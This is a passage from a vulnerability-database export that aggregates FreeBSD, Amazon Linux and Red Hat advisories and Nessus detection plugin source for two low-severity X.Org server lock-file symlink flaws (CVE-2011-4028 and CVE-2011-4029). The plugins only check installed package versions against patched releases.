This is caused by a race between creating the lock\n\t file and setting its access modes.\n\n", "edition": 4, "modified": "2011-10-18T00:00:00", "published": "2011-10-18T00:00:00", "id": "8441957C-F9B4-11E0-A78A-BCAEC565249C", "href": "https://vuxml.freebsd.org/freebsd/8441957c-f9b4-11e0-a78a-bcaec565249c.html", "title": "Xorg server -- two vulnerabilities in X server lock handling code", "type": "freebsd", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}], "amazon": [{"lastseen": "2020-11-10T12:36:20", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "**Issue Overview:**\n\nA flaw was found in the way the X.Org server handled lock files. A local user with access to the system console could use this flaw to determine the existence of a file in a directory not accessible to the user, via a symbolic link attack. ([CVE-2011-4028 __](<https://access.redhat.com/security/cve/CVE-2011-4028>))\n\nA race condition was found in the way the X.Org server managed temporary lock files. A local attacker could use this flaw to perform a symbolic link attack, allowing them to make an arbitrary file world readable, leading to the disclosure of sensitive information. 
([CVE-2011-4029 __](<https://access.redhat.com/security/cve/CVE-2011-4029>))\n\n \n**Affected Packages:** \n\n\nxorg-x11-server\n\n \n**Issue Correction:** \nRun _yum update xorg-x11-server_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n xorg-x11-server-common-1.10.6-1.12.amzn1.i686 \n xorg-x11-server-Xvfb-1.10.6-1.12.amzn1.i686 \n xorg-x11-server-Xephyr-1.10.6-1.12.amzn1.i686 \n xorg-x11-server-Xnest-1.10.6-1.12.amzn1.i686 \n xorg-x11-server-debuginfo-1.10.6-1.12.amzn1.i686 \n \n noarch: \n xorg-x11-server-source-1.10.6-1.12.amzn1.noarch \n \n src: \n xorg-x11-server-1.10.6-1.12.amzn1.src \n \n x86_64: \n xorg-x11-server-debuginfo-1.10.6-1.12.amzn1.x86_64 \n xorg-x11-server-Xephyr-1.10.6-1.12.amzn1.x86_64 \n xorg-x11-server-Xnest-1.10.6-1.12.amzn1.x86_64 \n xorg-x11-server-Xvfb-1.10.6-1.12.amzn1.x86_64 \n xorg-x11-server-common-1.10.6-1.12.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2012-07-05T16:24:00", "published": "2012-07-05T16:24:00", "id": "ALAS-2012-104", "href": "https://alas.aws.amazon.com/ALAS-2012-104.html", "title": "Low: xorg-x11-server", "type": "amazon", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2021-01-17T14:01:20", "description": "The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - The LockServer function in os/utils.c in X.Org xserver\n before 1.11.2 allows local users to determine the\n existence of arbitrary files via a symlink attack on a\n temporary lock file, which is handled differently if the\n file exists. (CVE-2011-4028)\n\n - The LockServer function in os/utils.c in X.Org xserver\n before 1.11.2 allows local users to change the\n permissions of arbitrary files to 444, read those files,\n and possibly cause a denial of service (removed\n execution permission) via a symlink attack on a\n temporary lock file. 
(CVE-2011-4029)", "edition": 24, "published": "2015-01-19T00:00:00", "title": "Oracle Solaris Third-Party Patch Update : xorg (cve_2011_4028_information_disclosure)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "modified": "2015-01-19T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:xorg", "cpe:/o:oracle:solaris:11.0"], "id": "SOLARIS11_XORG_20120417.NASL", "href": "https://www.tenable.com/plugins/nessus/80818", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80818);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : xorg (cve_2011_4028_information_disclosure)\");\n script_summary(english:\"Check for the 'entire' version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - The LockServer function in os/utils.c in X.Org xserver\n before 1.11.2 allows local users to determine the\n existence of arbitrary files via a symlink attack on a\n temporary lock file, which is handled differently if the\n file exists. (CVE-2011-4028)\n\n - The LockServer function in os/utils.c in X.Org xserver\n before 1.11.2 allows local users to change the\n permissions of arbitrary files to 444, read those files,\n and possibly cause a denial of service (removed\n execution permission) via a symlink attack on a\n temporary lock file. 
(CVE-2011-4029)\"\n );\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4a913f44\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2011-4028-information-disclosure-vulnerability-in-xorg\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?37e2409e\"\n );\n # https://blogs.oracle.com/sunsecurity/cve-2011-4029-race-condition-vulnerability-in-xorg\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?71efa4a9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Solaris 11/11 SRU 6.6.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:xorg\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, 
\"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^xorg$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xorg\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.0.6.0.6.0\", sru:\"SRU 6.6\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : xorg\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_note(port:0, extra:error_extra);\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"xorg\");\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T10:46:43", "description": "Matthieu Herrb reports :\n\nIt is possible to deduce if a file exists or not by exploiting the way\nthat Xorg creates its lock files. This is caused by the fact that the\nX server is behaving differently if the lock file already exists as a\nsymbolic link pointing to an existing or non-existing file.\n\nIt is possible for a non-root user to set the permissions for all\nusers on any file or directory to 444, giving unwanted read access or\ncausing denies of service (by removing execute permission). 
This is\ncaused by a race between creating the lock file and setting its access\nmodes.", "edition": 24, "published": "2011-10-19T00:00:00", "title": "FreeBSD : Xorg server -- two vulnerabilities in X server lock handling code (8441957c-f9b4-11e0-a78a-bcaec565249c)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "modified": "2011-10-19T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:xorg-server"], "id": "FREEBSD_PKG_8441957CF9B411E0A78ABCAEC565249C.NASL", "href": "https://www.tenable.com/plugins/nessus/56548", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56548);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n\n script_name(english:\"FreeBSD : Xorg server -- two vulnerabilities in X server lock handling code (8441957c-f9b4-11e0-a78a-bcaec565249c)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Matthieu Herrb reports :\n\nIt is possible to deduce if a file exists or not by exploiting the way\nthat Xorg creates its lock files. This is caused by the fact that the\nX server is behaving differently if the lock file already exists as a\nsymbolic link pointing to an existing or non-existing file.\n\nIt is possible for a non-root user to set the permissions for all\nusers on any file or directory to 444, giving unwanted read access or\ncausing denies of service (by removing execute permission). 
This is\ncaused by a race between creating the lock file and setting its access\nmodes.\"\n );\n # https://vuxml.freebsd.org/freebsd/8441957c-f9b4-11e0-a78a-bcaec565249c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0c0099c5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:xorg-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"xorg-server<1.7.7_3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:pkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T13:10:55", "description": "Updated xorg-x11-server packages that fix two security issues and\nseveral bugs are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nX.Org is an open source implementation of the X Window System. It\nprovides the basic low-level functionality that full-fledged graphical\nuser interfaces are designed upon.\n\nA flaw was found in the way the X.Org server handled lock files. A\nlocal user with access to the system console could use this flaw to\ndetermine the existence of a file in a directory not accessible to the\nuser, via a symbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed\ntemporary lock files. 
A local attacker could use this flaw to perform\na symbolic link attack, allowing them to make an arbitrary file world\nreadable, leading to the disclosure of sensitive information.\n(CVE-2011-4029)\n\nRed Hat would like to thank the researcher with the nickname vladz for\nreporting these issues.\n\nThis update also fixes the following bugs :\n\n* Prior to this update, the KDE Display Manager (KDM) could pass\ninvalid 24bpp pixmap formats to the X server. As a consequence, the X\nserver could unexpectedly abort. This update modifies the underlying\ncode to pass the correct formats. (BZ#651934, BZ#722860)\n\n* Prior to this update, absolute input devices, like the stylus of a\ngraphic tablet, could become unresponsive in the right-most or\nbottom-most screen if the X server was configured as a multi-screen\nsetup through multiple 'Device' sections in the xorg.conf file. This\nupdate changes the screen crossing behavior so that absolute devices\nare always mapped across all screens. (BZ#732467)\n\n* Prior to this update, the misleading message 'Session active, not\ninhibited, screen idle. If you see this test, your display server is\nbroken and you should notify your distributor.' could be displayed\nafter resuming the system or re-enabling the display, and included a\nURL to an external web page. This update removes this message.\n(BZ#748704)\n\n* Prior to this update, the erroneous input handling code of the\nXephyr server disabled screens on a screen crossing event. The focus\nwas only on the screen where the mouse was located and only this\nscreen was updated when the Xephyr nested X server was configured in a\nmulti-screen setup. This update removes this code and Xephyr now\ncorrectly updates screens in multi-screen setups. (BZ#757792)\n\n* Prior to this update, raw events did not contain relative axis\nvalues. As a consequence, clients which relied on relative values for\nfunctioning did not behave as expected. 
This update sets the values to\nthe original driver values instead of the already transformed values.\nNow, raw events contain relative axis values as expected. (BZ#805377)\n\nAll users of xorg-x11-server are advised to upgrade to these updated\npackages, which correct these issues. All running X.Org server\ninstances must be restarted for this update to take effect.", "edition": 25, "published": "2012-06-20T00:00:00", "title": "RHEL 6 : xorg-x11-server (RHSA-2012:0939)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "modified": "2012-06-20T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-devel", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-source", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-common", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xephyr", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xorg", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-debuginfo", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xnest", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xvfb", "p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xdmx"], "id": "REDHAT-RHSA-2012-0939.NASL", "href": "https://www.tenable.com/plugins/nessus/59597", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0939. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59597);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_bugtraq_id(50193, 50196);\n script_xref(name:\"RHSA\", value:\"2012:0939\");\n\n script_name(english:\"RHEL 6 : xorg-x11-server (RHSA-2012:0939)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated xorg-x11-server packages that fix two security issues and\nseveral bugs are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nX.Org is an open source implementation of the X Window System. It\nprovides the basic low-level functionality that full-fledged graphical\nuser interfaces are designed upon.\n\nA flaw was found in the way the X.Org server handled lock files. A\nlocal user with access to the system console could use this flaw to\ndetermine the existence of a file in a directory not accessible to the\nuser, via a symbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed\ntemporary lock files. 
A local attacker could use this flaw to perform\na symbolic link attack, allowing them to make an arbitrary file world\nreadable, leading to the disclosure of sensitive information.\n(CVE-2011-4029)\n\nRed Hat would like to thank the researcher with the nickname vladz for\nreporting these issues.\n\nThis update also fixes the following bugs :\n\n* Prior to this update, the KDE Display Manager (KDM) could pass\ninvalid 24bpp pixmap formats to the X server. As a consequence, the X\nserver could unexpectedly abort. This update modifies the underlying\ncode to pass the correct formats. (BZ#651934, BZ#722860)\n\n* Prior to this update, absolute input devices, like the stylus of a\ngraphic tablet, could become unresponsive in the right-most or\nbottom-most screen if the X server was configured as a multi-screen\nsetup through multiple 'Device' sections in the xorg.conf file. This\nupdate changes the screen crossing behavior so that absolute devices\nare always mapped across all screens. (BZ#732467)\n\n* Prior to this update, the misleading message 'Session active, not\ninhibited, screen idle. If you see this test, your display server is\nbroken and you should notify your distributor.' could be displayed\nafter resuming the system or re-enabling the display, and included a\nURL to an external web page. This update removes this message.\n(BZ#748704)\n\n* Prior to this update, the erroneous input handling code of the\nXephyr server disabled screens on a screen crossing event. The focus\nwas only on the screen where the mouse was located and only this\nscreen was updated when the Xephyr nested X server was configured in a\nmulti-screen setup. This update removes this code and Xephyr now\ncorrectly updates screens in multi-screen setups. (BZ#757792)\n\n* Prior to this update, raw events did not contain relative axis\nvalues. As a consequence, clients which relied on relative values for\nfunctioning did not behave as expected. 
This update sets the values to\nthe original driver values instead of the already transformed values.\nNow, raw events contain relative axis values as expected. (BZ#805377)\n\nAll users of xorg-x11-server are advised to upgrade to these updated\npackages, which correct these issues. All running X.Org server\ninstances must be restarted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0939\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4028\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4029\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xdmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xephyr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xnest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xorg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xvfb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0939\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xorg-x11-server-Xdmx-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xorg-x11-server-Xdmx-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xdmx-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xorg-x11-server-Xephyr-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xorg-x11-server-Xephyr-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xephyr-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xorg-x11-server-Xnest-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xorg-x11-server-Xnest-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xnest-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xorg-x11-server-Xorg-1.10.6-1.el6\")) flag++;\n if 
(rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xorg-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xorg-x11-server-Xvfb-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xorg-x11-server-Xvfb-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xvfb-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xorg-x11-server-common-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xorg-x11-server-common-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xorg-x11-server-common-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xorg-x11-server-debuginfo-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"xorg-x11-server-debuginfo-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xorg-x11-server-debuginfo-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"xorg-x11-server-devel-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"xorg-x11-server-devel-1.10.6-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"xorg-x11-server-source-1.10.6-1.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xorg-x11-server-Xdmx / xorg-x11-server-Xephyr / etc\");\n }\n}\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-06T09:27:50", "description": "Updated xorg-x11-server packages that fix two security issues and\nseveral bugs are now available for Red 
Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nX.Org is an open source implementation of the X Window System. It\nprovides the basic low-level functionality that full-fledged graphical\nuser interfaces are designed upon.\n\nA flaw was found in the way the X.Org server handled lock files. A\nlocal user with access to the system console could use this flaw to\ndetermine the existence of a file in a directory not accessible to the\nuser, via a symbolic link attack. (CVE-2011-4028)\n\nA race condition was found in the way the X.Org server managed\ntemporary lock files. A local attacker could use this flaw to perform\na symbolic link attack, allowing them to make an arbitrary file world\nreadable, leading to the disclosure of sensitive information.\n(CVE-2011-4029)\n\nRed Hat would like to thank the researcher with the nickname vladz for\nreporting these issues.\n\nThis update also fixes the following bugs :\n\n* Prior to this update, the KDE Display Manager (KDM) could pass\ninvalid 24bpp pixmap formats to the X server. As a consequence, the X\nserver could unexpectedly abort. This update modifies the underlying\ncode to pass the correct formats. (BZ#651934, BZ#722860)\n\n* Prior to this update, absolute input devices, like the stylus of a\ngraphic tablet, could become unresponsive in the right-most or\nbottom-most screen if the X server was configured as a multi-screen\nsetup through multiple 'Device' sections in the xorg.conf file. This\nupdate changes the screen crossing behavior so that absolute devices\nare always mapped across all screens. (BZ#732467)\n\n* Prior to this update, the misleading message 'Session active, not\ninhibited, screen idle. 
